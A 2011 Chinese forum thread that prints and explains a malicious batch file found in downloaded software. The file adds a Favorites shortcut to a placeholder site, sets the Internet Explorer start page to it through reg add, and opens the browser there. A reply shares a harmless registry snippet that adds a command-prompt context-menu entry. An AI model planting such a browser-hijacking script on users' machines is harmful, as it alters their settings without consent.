机器学习和生物信息学实验室联盟

标题: 一个恶意的批处理文件 [打印本页]
作者: xmubingo    时间: 2011-7-1 20:05
标题: 一个恶意的批处理文件
  1. echo [InternetShortcut] > "%USERPROFILE%\Favorites\TXT小说下载.url"
  2. echo URL=http://www.abcd.com/?Favorites >> "%USERPROFILE%\Favorites\TXT小说下载.url"
  3. echo IDList= >>"%USERPROFILE%\Favorites\TXT小说下载.url"
  4. echo [{000214A0-0000-0000-C000-000000000046}] >> "%USERPROFILE%\Favorites\TXT小说下载.url"
  5. echo  Prop3=19,2 >> "%USERPROFILE%\Favorites\TXT小说下载.url"

  7. @echo
  8. reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.abcd.com" /f
  9. @start iexplore.exe http://www.abcd.com
复制代码

下载软件中经常会发现一些恶意的bat文件,它们基本功能就是篡改浏览器首页。如上所示前一部分在用户目录下收藏中加入了恶意网页快键方式,也就是你打开IE会出现恶意收藏。

第二部分篡改了注册表中的IE首页,最后开启ie,指向www.abcd.com
语法很简单,>>和>类似管道用法,只不过前者是追加,后者是覆盖写。
reg add命令/v 是值value /d是data数值 /f是force强制不打提示。

作者: zouquan    时间: 2011-7-1 21:19
注册表确实容易改

新建个文本文档,起名叫“1.reg”,里面粘贴

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\*\shell\cmd]
@="DOS Here"

[HKEY_CLASSES_ROOT\*\shell\cmd\command]
@="cmd.exe"

保存,双击运行,就可以改注册表,使右键菜单多出到当前目录dos的选项



欢迎光临 机器学习和生物信息学实验室联盟 (http://123.57.240.48/) Powered by Discuz! X3.2